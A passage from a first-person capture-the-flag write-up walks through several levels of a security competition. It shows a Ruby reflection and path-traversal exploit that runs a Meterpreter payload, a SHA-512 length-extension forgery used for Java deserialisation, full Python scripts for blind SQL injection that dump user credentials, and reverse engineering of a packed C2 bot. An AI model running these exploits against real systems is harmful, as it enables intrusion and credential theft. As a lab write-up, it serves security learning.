Based on the source code, the ctype parameter initalised a matching Ruby object with ctype.constantize. Thereafter, c.public_send executed any of that object's public methods based on the cop parameter. The method was executed with arguments from the cargs array parameter.

However, pool-of-tears featured an interesting twist: because it prepended Rails.application.config. message_dir + params[:uniqid] string to the cargs array, I could not execute anything I wanted; the method needed to accept the concatenated file path as the first argument. For example, one publicly-known Ruby reflection payload used Object.public_send("send","eval","system 'uname'"), which required the first argument to send to be eval. Since eval was a private method for Object, I could not execute it directly with public_send.

I searched the Ruby documentation for a suitable class and public method that allowed me to execute code. Eventually, I found the Kernel class that included an exec public method. The first argument determined the command to be executed. Since this could be a file path, I realised that I could exploit a path traversal by sending a uniqid parameter like ../../../../../tmp/meterpreter. This led to c.public_send('exec', '/opt/wonderland/logs/../../../../../tmp/meterpreter'), therefore executing my meterpreter payload.

I uploaded the payload to /tmp/met64.elf, then triggered the API with curl 'http://localhost:4000/ api/v1/smoke?ctype=Kernel&cop=exec&uniqid= ../../../../tmp/met64.elf&content=test'. After a few tense seconds, I got my shell!

/home/mouse contained a binary flag3.bin which I executed to retrieve the flag. The directory also included an-unbirthday-invitation.letter:

Dear French Mouse,

    The March Hare and the Mad Hatter
        request the pleasure of your company
            for an tea party evening filled with
                clocks, food, fiddles, fireworks & more


    Last Month
        25:60 p.m.
            By the Stream, and Into the Woods
                Also available by way of port 4714

    Comfortable outdoor attire suggested

PS: Dormouse will be there!

PSPS: No palindromes will be tolerated! Nor are emordnilaps, and semordnilaps!

By the way, please quote the following before entering the party:


ed4a1a59-0869-48ad-8bc6-ac64b04b02b6

TISC{mu5t_53ll_4t_th3_t4l13sT_5UM}

Part 4: A Mad Tea Party

Great! We have all we need to attend the Tea Party!

To get an idea of what to expect, we've consulted with our informant (initials C.C) who advised:

β€œAttend the Mad Tea Party.

Come back with (what's in) the Hatter's head.

Sometimes the end of a tale might not be the end of the story.

Things that don't make logical sense can safely be ignored.

Do not eat that tiny Hello Kitty.”

This is nonsense to us, so you're on your own from here on out.

As described in the invitation letter, the challenge ran the final Java application a-mad-tea-party on localhost port 4714.

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"

Based on the source code of the application at tea-party/src/main/java/com/mad/hatter/App.java, I decided that the most likely exploit vector was the β€œEat Cake” option, which would deserialise the fireworks byte array into a Firework object before executing firework.fire():

case 9:
    System.out.println("You eat the cake and you feel good!");

    for (Cake.Decoration deco : cakep.getDecorationsList()) {
        if (deco == Cake.Decoration.TINY_HELLO_KITTY) {
            running = false;
            System.out.println("A tiny Hello Kitty figurine gets lodged in your " +
                    "throat. You get very angry at this and storm off.");
            break;
        }
    }

    if (cakep.getFireworksCount() == 0) {
        System.out.println("Nothing else interesting happens.");
    } else {
        for (ByteString firework_bs : cakep.getFireworksList()) {
            byte[] firework_data = firework_bs.toByteArray();
            Firework firework = (Firework) conf.asObject(firework_data);    // deserialisation
            firework.fire();
        }
    }
    break;

I believed this was the exploit vector because Java deserialisation was an infamous code execution method. However, I could not add a deserialisation payload using β€œAdd a Firework” because it only allowed me to select from a pre-set list of fireworks.

Which firework do you wish to add?

  1. Firecracker.
  2. Roman Candle.
  3. Firefly.
  4. Fountain.

Firework: 1
Firework added!

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
fireworks: "\000\001\032com.mad.hatter.Firecracker\000"

These fireworks had unexciting payloads, as seen in Firefly.java:

package com.mad.hatter;

public class Firefly extends Firework {

    static final long serialVersionUID = 45L;

    public void fire() {
        System.out.println("Firefly! Firefly! Firefly! Firefly! Fire Fire Firefly!");
    }

}

Meanwhile, the β€œCake to Go” option exported my current cake in the format {"cake":"<HEX(BASE64(PROTOBUF serialisED CAKE DATA))>","digest":"<ENCRYPTED HASH>"}.

Choice: 7
Here's your cake to go:
{"cake":"<CAKE DATA>","digest":"<DIGEST>"}

I could also import cakes with the β€œGo to Cake” option.

Choice: 8
Please enter your saved cake: {"cake":""<CAKE DATA>","digest":"<DIGEST>"}
Cake successfully gotten!

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
fireworks: "\000\001\032com.mad.hatter.Firecracker\000"

This looked like a good way to smuggle my own Firework data. However, the source code revealed that the application properly validated the digest value using a SHA-512 hash.

case 8:

    System.out.print("Please enter your saved cake: ");

    scanner.nextLine();
    String saved = scanner.nextLine().trim();

    try {

        HashMap<String, String> hash_map = new HashMap<String, String>();
        hash_map = (new Gson()).fromJson(saved, hash_map.getClass());
        byte[] challenge_digest = Hex.decodeHex(hash_map.get("digest"));
        byte[] challenge_cake_b64 = Hex.decodeHex(hash_map.get("cake"));
        byte[] challenge_cake_data = Base64.decodeBase64(challenge_cake_b64);

        MessageDigest md = MessageDigest.getInstance("SHA-512");
        byte[] combined = new byte[secret.length + challenge_cake_b64.length];
        System.arraycopy(secret, 0, combined, 0, secret.length);
        System.arraycopy(challenge_cake_b64, 0, combined, secret.length,
                challenge_cake_b64.length);
        byte[] message_digest = md.digest(combined);

        if (Arrays.equals(message_digest, challenge_digest)) {
            Cake new_cakep = Cake.parseFrom(challenge_cake_data);
            cakep.clear();
            cakep.mergeFrom(new_cakep);
            System.out.println("Cake successfully gotten!");
        }
        else {
            System.out.println("Your saved cake went really bad...");
        }

In order to forge my own arbitrary cake data, I needed to pass this check. I found a great Dragon CTF 2019 writeup that covered a similar challenge involving protobuf-serialised data and an MD5 hash verification. However, while MD5 collisions are easy to create, this application used SHA-512 which would be impossible in theory to brute force or collide – not that it stopped me from trying. After many fruitless attempts at cracking the hash, I pondered the challenge description again. β€œThings that don't make logical sense can safely be ignored” clearly warned me against taking on the impossible like cracking SHA-512. But what did β€œSometimes the end of a tale might not be the end of the story” mean?

After several more hours of aimless wandering, I found a StackExchange discussion about breaking SHA-512. One of the answers struck me:

Are there any successful attacks out there?

No, except length extension attacks, which are possible on any unaltered or extended Merkle-Damgard hash construction (SHA-1, MD5 and many others, but not SHA-3 / Keccak). If that's a problem depends on how the hash is used. In general, cryptographic hashes are not considered broken just because they suffer from length extension attacks.

Length extension attacks... β€œSometimes the end of a tale might not be the end of the story”... I facepalmed for probably the hundredth time in the competition.

The application prepended a salt (the secret variable) to the base64-encoded cake data, then generated a SHA-512 hash of the concatenated string. Furthermore, the source code revealed the length of secret:

public static byte[] get_secret() throws IOException {
    // Read the secret from /home/hatter/secret.
    byte[] data = FileUtils.readFileToByteArray(new File("/home/hatter/secret"));
    if (data.length != 32) {
        System.out.println("Secret does not match the right length!");
    }
    return data;
}

This was a classic setup for a hash extension attack. I won't re-hash the explanation – there is a hash_extender repository on GitHub that breaks down this attack. Even better, it includes a tool to perform the hash extension attack on several hash algorithms, including SHA-512. Thanks, Ron Bowes!

I generated a test payload to append candle = 1 in Protobuf format to the data I had previously exported using the Cake to Go function.

> hash_extender/hash_extender -l 32 -d CgAQACIA -s <ORIGINAL HASH> -f sha512 -a EAE=
> <FORGED MESSAGE DIGEST>

I tested the modified JSON by importing it into the application using the Go to Cake function.

Please enter your saved cake: {"cake":"<CAKE DATA>","digest":"<DIGEST>"}
{"cake":"<CAKE DATA>","digest":"<DIGEST>"}
Cake successfully gotten!

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: ""
candles: 1
flavour: ""

Great success!

After confirming that the hash length extension attack allowed me to forge my own cake data, I moved on to generate a deserialisation payload. ysoserial appeared to be the obvious tool of choice, but according to the pom.xml manifest, the application only imported commons-beanutils whereas the ysoserial CommonsBeanutils1 payload required commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2. Fortunately, after checking some of the pull requests for the repository, I discovered one that removed the additional dependencies. Pumped with excitement, I cloned the repo, modified the code based on the pull request, generated my payload, and sent my hash-extended data. It didn't work.

Checking the error messages, I realised to my horror that the application did not use the standard ObjectInputStream deserialisation. Instead, it was using the FST library to serialise and deserialise payloads and thus required a completely different serialisation format. To get the ysoserial payload to work, I modified the tool's source code in GeneratePayload.java to use FST instead of ByteArrayOutputStream.

public class GeneratePayload {
	private static final int INTERNAL_ERROR_CODE = 70;
	private static final int USAGE_CODE = 64;

	static FSTConfiguration conf = FSTConfiguration.createDefaultConfiguration();

    ...

		try {
			final ObjectPayload payload = payloadClass.newInstance();
			final Object object = payload.getObject(command);
			PrintStream out = System.out;
			byte[] payload_data = conf.asByteArray(object);
			FileOutputStream outputStream = new FileOutputStream("payload.hex");
			outputStream.write(payload_data);

I re-compiled ysoserial, generated my payload, and sent it off. However, it crashed again when entering my JSON payload. What went wrong? Looking at the error messages, I realised that the program cut off my input at 4096 bytes. This was because the code used scanner.nextLine() to accept input, which was limited to 4096 bytes at a time. At my wits' end, I made a last-ditch attempt by port forwarding the application via my Meterpreter shell, then used pwntools to send the input directly instead of copying and pasting my payload.

from pwn import *

## p = process(['java', '-jar','opt/wonderland/a-mad-tea-party/tea-party/target/tea-party-1.0-SNAPSHOT.jar'])
p = remote('<IP ADDRESS>', 4445)

print(p.recvuntil("Invitation Code:"))
p.sendline(b'<INVITATION CODE>')
print(p.recvuntil("Choice:"))
p.sendline(b'8')
p.sendline(b'{"cake":"<CAKE DATA>","digest":"<DIGEST>"}')

p.interactive()

To my huge relief, it worked and I got my Meterpreter shell! I was finally at the end of this long rabbit hole. Take a bow!

Success

TISC{W3_y4wN_A_Mor3_r0m4N_w4y}

Level 10: Malware for UwU

Domains: Web, Binary Exploitation (Windows Shellcoding), Reverse Engineering, Cryptography

We've found a PALINDROME webserver, suspected to be the C2 Server of a newly discovered malware! Get the killswitch from the bot masters before the malware goes live!

May the Force (not brute force) be with UwU!

http://18.142.2.80:18080/

The final countdown! I headed to the website which featured a simple login page.

Login Page

I could register as a user without any problems.

Register Page

After registering, I logged in to a simple dashboard.

Normal User

The beautiful bird image was in fact a huge series of styled <span> elements.

<span class="ascii" style="display:inline-block;white-space:pre;letter-spacing:0;line-height:1;font-family:'BitstreamVeraSansMono','CourierNew',Courier,monospace;font-size:16px;border-width:1px;border-style:solid;border-color:lightgray;">
    <span style="background-color:#d7875f;color: #d7af87;">|</span>
    <span style="background-color:#d7875f;color: #af5f00;">|</span>
    <span style="background-color:#d7875f;color: #af5f00;">|</span><
    ...
</span>

Since the original domain description for this level omitted Web, I suspected this was a Cryptography challenge and got tangled up trying to analyse the hexadecimal colour values. After several fruitless hours, I clarified this with the organisers and they corrected the domain list to include Web. This prompted me to look for Web attack vectors instead. The β€œContact your PALINDROME admin for further instructions!” text suggested that an admin user account existed so I began looking for a possible SQL injection. At first, I thought that the login form was vulnerable because sending %27+OR+%27 in the password field caused the response to drop. However, I eventually decided that this was a deliberate red herring because %27+OR++%27, which should have been interpreted the same as %27+OR+%27 in SQL syntax, did not drop the response.

Moving on, I noticed something interesting when I added a single quote to all of the form values while registering a new user.

POST /new_user.php HTTP/1.1
Host: <IP ADDRESS>:18080
Content-Length: 146
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<IP ADDRESS>:18080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=johndoe'&password=johndoe'&recovery_q1=Q1'&recovery_a1=johndoe'&recovery_q2=Q2'&recovery_a2=johndoe'&recovery_q3=Q4'&recovery_a3=johndoe'

When I tried to reset the user's password with recovery questions, the password reset self-service correctly fetched the user but failed to fetch any of the recovery questions.

Bugged Password Reset

This suggested that an SQL injection had occurred in the SQL statement fetching the user's recovery questions. I guessed that the statement partly resembled select question_text from recovery_questions where recovery_id = '<UNSANITISED VALUE OF recovery_q1 FROM REGISTRATION>'. As such, I could exploit a two-step SQL injection by signing up with the SQL payload in the recovery_q1 parameter, then retrieving the result at the user's password reset page. Unfortunately, after further testing I discovered that the application ran a filter on UNION in my payload that prevented me from directly leaking additional strings; all UNION payloads failed even though typical ' AND '1'='1 injections worked. Furthermore, the SELECT INTO OUTFILE remote code execution vector also failed. Instead, I relied on boolean-based output. If my injected statements evaluated to true, the password reset page would correctly fetch the user's recovery question text. If they evaluated to false, the recovery question text would be missing.

This required massive numbers of registration and password reset requests, forcing me to automate my SQL injection. I used GUIDs for the usernames to avoid collisions in registration. My first order of business was to enumerate the table names. I leaked the number of tables and then retrieved the names of the last few tables to ensure that they were user-created rather than system tables.

import requests
import uuid
import string

NEW_USER_URL = 'http://<IP ADDRESS>:18080/new_user.php'
FORGOT_PASSWORD_URL = 'http://<IP ADDRESS>:18080/forgot_password.php'
CANDIDATE_LETTERS = string.printable

## Get number of tables
## 63
## appdb
def leak_table_count():
    count = 0
    found = False
    while not found:
        username = uuid.uuid4().hex
        payload = {
            'username': username, 
            'password': username,
            'recovery_q1': 'Q1',
            'recovery_a1': username,
            'recovery_q2': 'Q2',
            'recovery_a2': username,
            'recovery_q3': 'Q3',
            'recovery_a3': username
        }

        payload['recovery_q1'] = "Q1' AND ((SELECT COUNT(*) from information_schema.tables)='{}')#".format(count)
        r = requests.post(NEW_USER_URL, data=payload)
        # print(r.text)
        if 'New UwUser registered!' in r.text:
            print("CREATED USER WITH PAYLOAD {}".format(payload))
        else:
            print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
            exit(-1)
        r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
        if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
            print("CANDIDATE SUCCESS")
            found = True
        else:
            print("CANDIDATE FAILED")
            # exit(-1)
        count += 1

    print("Number of tables: {}".format(count))


## Get table name (start from last few tables to get user tables)
## innodb_sys_tablestats, qnlist, userlist
def leak_table_name(table_number):
    table_name = ''
    found = True
    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username, 
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }

            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT table_name from information_schema.tables LIMIT {}, 1), 1, {})) = BINARY '{}'#".format(table_number, len(table_name) + 1, table_name + candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            if 'New UwUser registered!' in r.text:
                print("CREATED USER WITH PAYLOAD {}".format(payload))
            else:
                print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                print("CANDIDATE SUCCESS")
                found = True
                table_name += candidate_letter
                print(table_name)
                break
            else:
                print("CANDIDATE FAILED")
    print(table_name)

Now that I had the table names qnlist and userlist, I retrieved their column names.

## Get concatted column names for the table
## username,pwdhash,usertype,email,recover_q1,recover_a1,recover_q2,recover_a2,recover_q3,recover_a3
## q_tag, q_body
def leak_column_names(table_name):
    column_names = ''
    found = True
    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username, 
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }
            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name = '{}'), 1, {})) = BINARY '{}'#".format(table_name, len(column_names) + 1, column_names + candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            if 'New UwUser registered!' in r.text:
                print("CREATED USER WITH PAYLOAD {}".format(payload))
            else:
                print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                print("CANDIDATE SUCCESS")
                found = True
                column_names += candidate_letter
                print(column_names)
                break
            else:
                print("CANDIDATE FAILED")
    print(column_names)

usertype suggested that there indeed existed an admin user in the database. I began retrieving all of the users' data.

## Leaks user data (only leak essential columns to takeover)
## TeoYiBoon,3043b513222221993f7ade356f521566,0,[email protected],Q2,Dirty Gorilla,Q6,Mark Zuckerberg,Q7,Fox
## oscarthegrouch,3043b513244444993f7ade356f521566,0,[email protected],Q3,cat recycle bin,Q4,Operation Garbage Can,Q5,5267385
## barney,3043b513244555993f7ade356f521566,0,[email protected],Q1,Major Planet,Q4,Operation Garbage Can,Q7,Purple dinosaur
## rollrick,3043b513244556993f7ade356f521566,0,[email protected],Q2,Rick n Roll,Q3,Operation RICKROLL,Q6,PICKLE RICKKKK
## noobuser,3043b513111111993f7ade356f521566,0,[email protected],Q1,Boba Abob,Q2,Eternal Fuchsia,Q3,Troll your buddy
def leak_user_data(user_number):
    user_data = ''
    found = True

    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username, 
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }
            # CONCAT(username,',',usertype,',',email,',',recover_a1,',',recover_a2,',',recover_a3)
                        # payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT CONCAT(HEX(recover_a1),',',HEX(recover_a2),',',HEX(recover_a3)) from userlist LIMIT {}, 1), {}, 1)) = BINARY '{}'#".format(user_number, len(user_data) + 1, candidate_letter) # for my boy c1-admin
            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT CONCAT(recover_a1,',',recover_q2,',',recover_a2,',',recover_q3,',',recover_a3) from userlist LIMIT {}, 1), {}, 1)) = BINARY '{}'#".format(user_number, len(user_data) + 1, candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            # if 'New UwUser registered!' in r.text:
            #     print("CREATED USER WITH PAYLOAD {}".format(payload))
            if not 'New UwUser registered!' in r.text:
                # print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                # print("CANDIDATE SUCCESS: {}".format(ord(candidate_letter)))
                found = True
                user_data += candidate_letter
                print(user_data)
                break
            # else:
                # print("CANDIDATE FAILED")
        # break
    print(user_data)

I needed to HEX the fetched user's data because when my script reached the juicy laojiao-c2admin user, it exited early on recovery answer 2, returning X. I suspected that there was some kind of special character in the way. Indeed, the user's answer to What is the name of an up and coming evil genius that inspires you? turned out to be X Γ† A-12. Along the way, I modified my script to leak a few additional values and confirmed that the current examdbuser@localhost user lacked FILE permissions. Additionally, I found out that the application sanitised union to onion and sleep to sheep. Eventually, I finished extracting the admin user's data: laojiao-c2admin,1,[null],6-235-35-35,X Γ† A-12,Nat Uwu Tan.

I successfully reset laojiao-c2admin's password using the recovery answers and logged in. This time, I encountered the same dashboard with an important change at the bottom – instead of β€œContact your PALINDROME admin for further instructions!”, there was a link to download a binary named UwU.exe!

I downloaded UwU.exe and attempted to execute it, but it exited immediately. I opened it in PE-bear and noticed that the .text and .data sections had been replaced by .MPRESS1 and .MPRESS2

PE-bear

I Googled this and found out that this was an indicator that the executable had been packed by the MPRESS packer. There were several tutorials online that described how to manually unpack such executables, but I wanted to try some automated options first. Here's a list of the ones I used.

  1. Avast RetDec: Failed to recognise the MPRESS packing.
  2. unipacker: Managed to unpack but set the original entry point too early so the executable crashed.
  3. QuickUnpack: The OG unpacker. It was difficult to find a working copy and I had to download it in a hermetically sealed VM and take a shower afterwards. Unsurprisingly, this was the only unpacker that worked perfectly.

With the unpacked UwU.exe, I could now easily decompile and debug it.

I executed the binary and was blasted by the song of my people.

UwU Start

Right away, I tried the β€œDisplay Killswitch” option and enjoyed another sweet, sweet lullaby but no killswitch flag.

UwU Killswitch

Next, I ran the β€œRegister Bird” option, which prompted me for an IP address and port. I set this to the website's IP address and port and successfully registered. Additionally, this triggered a HTTP request that I retrieved using WireShark.

POST /register.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 60
Host: <IP ADDRESS>:18080

action=register&a=roVwGx&b=gD4ZuM&c=pFvulv&d=XH2CPq&e=I3Yonk

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2021 16:33:53 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 48
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma

Next, I selected β€œSend Message” which accepted a target UwUID and message before sending another HTTP request.

POST /send.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 28
Host: <IP ADDRESS>:18080

action=send&a=ABCDEF&b=HELLO

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2021 16:35:34 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Finally, I tested β€œReceive Messages” which continuously sent the following HTTP request every few seconds.

POST /receive.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 56
Host: <IP ADDRESS>:18080

UwUID=oVSFHfzJoQSfTP3PphqGSf7Lug%2bHTfrSrwHXRv2c9ATWGfma

I also popped the executable into VirusTotal and ANY.RUN to observe more static or dynamic behaviour but did not glean anything new. I moved on to reverse engineering the unpacked executable, starting with the register function.

The binary featured many dead ends. For example, it included unreachable code like this.

  switch ( rand() % 5 )   // actually, none of these will happen right? can safely ignore
  {
    case 44:
      display_logo();
      break;
    case 88:
      display_killswitch();
      break;
    case 132:
      sub_557571D0(v39, e_flat);
      sub_55752C60(v39[0], (int)v39[1], (int)v39[2], (int)v39[3], (int)v39[4], v40);
      break;
    case 176:
      receive_messages(v41);
      break;
    case 220:
      register_bird(v41);
      break;
    case 264:
      send_message(v41);
      break;
    default:
      break;

Additionally, the binary used very few plaintext strings, preferring to decrypt them dynamically. For example, the following function returned the value β€œNot registered”:

void __thiscall sub_557574E0(_BYTE *this)
{
  unsigned int v1; // ebx
  unsigned int v2; // esi

  if ( this[15] )
  {
    v1 = 0;
    v2 = 0;
    do
    {
      this[v2] ^= 0x5AA5D2B4D39B2B69ui64 >> (8 * (v2 & 7));
      v1 = (__PAIR64__(v1, v2++) + 1) >> 32;
    }
    while ( __PAIR64__(v1, v2) < 0xF );
    this[15] = 0;
  }
}

I decrypted these dynamically by setting breakpoints at the ret instruction and dumping EAX.

The first question I wanted to answer was how the binary generated the seemingly random a, b, c, d, and e parameters in the POST /register.php request. I found the obfuscated loop further down in the main function.

      for ( j = 9; ; j = 1401 )
      {
        while ( j <= 18 )
        {
          if ( j == 18 )
          {
            v34 = mersenne_rng_with_b62(v44);   // generate b parameter
            sub_55757100(v34);
            if ( v46 >= 0x10 )
            {
              v31 = v44[0];
              v32 = v46 + 1;
              if ( v46 + 1 >= 0x1000 )
              {
                v31 = *(_DWORD *)(v44[0] - 4);
                v32 = v46 + 36;
                if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                  goto LABEL_66;
              }
              v40 = v32;
              sub_5575B048(v31);
            }
            j = 4;
          }
          else if ( j == 4 )
          {
            v33 = mersenne_rng_with_b62(v44);   // generate c parameter
            sub_55757100(v33);
            if ( v46 >= 0x10 )
            {
              v31 = v44[0];
              v32 = v46 + 1;
              if ( v46 + 1 >= 0x1000 )
              {
                v31 = *(_DWORD *)(v44[0] - 4);
                v32 = v46 + 36;
                if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                  goto LABEL_66;
              }
              v40 = v32;
              sub_5575B048(v31);
            }
            j = 64;
          }
          else
          {
            v30 = mersenne_rng_with_b62(v44);   // generate a parameter
            sub_55757100(v30);
            if ( v46 >= 0x10 )
            {
              v31 = v44[0];
              v32 = v46 + 1;
              if ( v46 + 1 >= 0x1000 )
              {
                v31 = *(_DWORD *)(v44[0] - 4);
                v32 = v46 + 36;
                if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                  goto LABEL_66;
              }
              v40 = v32;
              sub_5575B048(v31);
            }
            j = 18;
          }
        }
        if ( j != 64 )
          break;
        v36 = mersenne_rng_with_b62(v44);       // generate d parameter
        sub_55757100(v36);
        if ( v46 >= 0x10 )
        {
          v31 = v44[0];
          v32 = v46 + 1;
          if ( v46 + 1 >= 0x1000 )
          {
            v31 = *(_DWORD *)(v44[0] - 4);
            v32 = v46 + 36;
            if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
              goto LABEL_66;
          }
          v40 = v32;
          sub_5575B048(v31);
        }
      }
      v35 = mersenne_rng_with_b62(v44);         // generate e parameter

Each parameter was 6 characters selected using a Mersenne Twister pseudo-random number generator algorithm from the base62 alphabet in the mersenne_rng_with_b62 function.

_DWORD *__usercall mersenne_rng_with_b62@<eax>(_DWORD *a1@<ecx>, int a2@<edi>, int a3@<esi>)
{
  _EXCEPTION_REGISTRATION_RECORD *v3; // eax
  void *v4; // esp
  unsigned int seed; // eax
  unsigned int i; // edx
  int v8; // edi
  int extracted_number; // eax
  unsigned int v10; // edx
  unsigned int v11; // ecx
  _DWORD *v12; // eax
  _BYTE *v13; // eax
  char v14; // cl
  int v17; // [esp+0h] [ebp-13CCh] BYREF
  int v18[1259]; // [esp+4h] [ebp-13C8h]
  int v19; // [esp+13B0h] [ebp-1Ch]
  int v20; // [esp+13B4h] [ebp-18h]
  char *base62_alphabet; // [esp+13B8h] [ebp-14h]
  int v22; // [esp+13BCh] [ebp-10h]
  _EXCEPTION_REGISTRATION_RECORD *v23; // [esp+13C0h] [ebp-Ch]
  char *v24; // [esp+13C4h] [ebp-8h]
  int v25; // [esp+13C8h] [ebp-4h]

  v25 = -1;
  v3 = NtCurrentTeb()->NtTib.ExceptionList;
  v24 = byte_5575CBE6;
  v23 = v3;
  v4 = alloca(5056);
  v18[1255] = (int)a1;
  v20 = 0;
  v18[1253] = 62;
  base62_alphabet = (char *)operator new(0x40u);
  v18[1254] = 63;
  v18[1249] = (int)base62_alphabet;
  strcpy(base62_alphabet, "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz");// base62
  v25 = 1;
  seed = std::_Random_device(a2, a3);
  v18[1248] = -1;
  i = 1;
  v18[0] = seed;
  do                                            // Initialise the generator from a seed
  {
    seed = i + 1812433253 * (seed ^ (seed >> 30));// Initialise Mersenne Twister with constant 1812433253
    v18[i++] = seed;
  }
  while ( i < 0x270 );
  *a1 = 0;
  a1[4] = 0;
  a1[5] = 15;
  *(_BYTE *)a1 = 0;
  v17 = 624;
  a1[4] = 0;
  *(_BYTE *)a1 = 0;
  v20 = 1;
  v18[1256] = (int)&v17;
  v8 = 6;
  v18[1257] = 32;
  v18[1258] = -1;
  do
  {
    extracted_number = get_next_mod_62(62);     // Retrieve next Mersenne PRNG number mod 62
    v10 = a1[5];
    v11 = a1[4];
    LOBYTE(v22) = base62_alphabet[extracted_number];    // Used number as offset in base62 alphabet
    if ( v11 >= v10 )
    {
      LOBYTE(v19) = 0;
      sub_557595E0(v11, v19, v22);
    }
    else
    {
      a1[4] = v11 + 1;
      v12 = a1;
      if ( v10 >= 0x10 )
        v12 = (_DWORD *)*a1;
      v13 = (char *)v12 + v11;
      v14 = v22;
      v13[1] = 0;
      *v13 = v14;
    }
    --v8;
  }
  while ( v8 );
  sub_5575B048(base62_alphabet);
  return a1;
}

I recognised the Mersenne Twister due to the presence of constants such as 1812433253. At this point, I fell down another hilarious rabbit hole. Apparently, the constants used by the program's Mersenne Twister matched those used to encrypt several Japanese game files. This led me to a game modder's decryption script that included the following comment:

Gist Comment

UwU indeed. I burned a few more hours chasing this false lead due to my faith in a fellow man of culture. Ultimately, I decided that the program only used the Mersenne Twister to generate random characters and nothing more.

Since these values were indeed (pseudo)randomly generated, perhaps it served as an encryption key for future communications with the server, a common pattern used by C2 frameworks. I tried base62-decrypting the parameters but only got gibberish. Next, I recalled that the dashboard on the website provided five master UwUIDs:

Here is a list of Bot Master UwUIDs:
- 715cf1a6-c0de-4a55-b055-c0ffeec0ffee
- 715cf1a6-baba-4a55-b0b0-c0ffeec0ffee
- 715cf1a6-510b-4a55-ba11-c0ffeec0ffee
- 715cf1a6-dead-4a55-a1d5-c0ffeec0ffee
